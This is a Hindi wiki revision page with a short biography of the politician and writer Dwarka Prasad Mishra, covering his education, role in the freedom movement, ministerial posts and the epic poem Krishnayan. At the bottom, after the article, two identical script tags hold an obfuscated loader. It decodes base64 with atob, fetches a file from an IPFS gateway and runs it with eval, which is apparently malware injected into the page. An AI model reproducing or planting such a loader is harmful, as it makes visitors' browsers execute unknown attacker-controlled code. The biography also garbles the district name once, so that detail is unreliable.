"द्वारका प्रसाद मिश्रा" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
(''''द्वारका प्रसाद मिश्रा''' (जन्म- 5 अगस्त, 1901, उन्नाव, [[...' के साथ नया पन्ना बनाया)
(कोई अंतर नहीं)

09:55, 23 अगस्त 2013 का अवतरण

द्वारका प्रसाद मिश्रा (जन्म- 5 अगस्त, 1901, उन्नाव, उत्तर प्रदेश; मृत्यु- 31 मई, 1988) भारत के प्रसिद्ध राजनेता, स्वतंत्रता सेनानी, पत्रकार और साहित्यकार थे। उन्होंने मध्य प्रदेश के मुख्यमंत्री पद को भी सुशोभित किया था। द्वारका प्रसाद मिश्रा महात्मा गाँधी के 'असहयोग आन्दोलन' से जुड़ गये थे। राष्ट्रवादी आन्दोलनों में उन्होंने सक्रियता से अपना योगदान दिया था। जवाहरलाल नेहरू से मतभेदों के कारण इन्हें तेरह वर्षों तक राजनीतिक वनवास भोगना पड़ा। इन्होंने कई ऐतिहासिक शोध ग्रंथ भी लिखे थे। हिन्दी, अंग्रेज़ी, उर्दू और संस्कृत साहित्य से द्वारका प्रसाद जी को बहुत लगाव था।

द्वारका प्रसाद मिश्रा उत्तर प्रदेश के अननियो जिले के एक ब्राह्मण परिवार में 5 अगस्त, 1901 को पैदा हुए। जब उनके पिता पण्डित अयोध्या प्रसाद रायपुर मे ठेकेदार के रूप में कार्य कर रहे थे तो उस समय वहाँ पर उन्होंने अपनी प्रारंभिक शिक्षा प्राप्त की। उन्होंने कुछ समय के लिए कानपुर और जबलपुर में अध्ययन किया तथा इलाहाबाद यूनिवर्सिटी से स्नात्तकोत्तर की परीक्षा तथा कानून की डिग्री प्राप्त की।

द्वारका प्रसाद महात्मा गांधी के असयोग आन्दोलन से जुड़ गये और तब से राष्ट्रवादी आन्दोलनों में अग्रिम पंक्ति में रहे वे 1937 और 1946 में केन्द्रीय प्रान्तों के मंत्री रहे। वे कुछ समय के लिए मध्य प्रदेश के मुख्यमंत्री भी रहे थे।

पण्डित मिश्रा एक प्रसिद्ध पत्रकार, कवि और रचनाकार थे। कृष्णायन नामक उनका महाकाव्य कृष्ण के जीवन पर आधारित होकर वर्तमान समय की समस्याओं पर केन्द्रित है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>